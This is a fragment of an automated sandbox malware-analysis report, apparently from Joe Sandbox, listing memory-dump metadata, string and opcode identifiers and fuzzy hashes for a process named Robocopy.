                                                                                    • Instruction Fuzzy Hash: FF510A35A0022A6BEF20AF99DE85FAE73A9EF4C704F4404E9E505A7180E770BF459F54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@$@wCv3G
                                                                                    • API String ID: 0-3924468624
                                                                                    • Opcode ID: 6687dd6d10d45ff910674fe27297bdd0e552e7bab2686362704a8697b30d9551
                                                                                    • Instruction ID: de741ad09443c46b8155393648919877b64c54ac38e57a7fa3054384cec2ad4a
                                                                                    • Opcode Fuzzy Hash: 6687dd6d10d45ff910674fe27297bdd0e552e7bab2686362704a8697b30d9551
                                                                                    • Instruction Fuzzy Hash: 04813FB2D002699BDB31CF54CD44BDEB6B8AF08714F0441EAEA19B7250E7706E85CFA1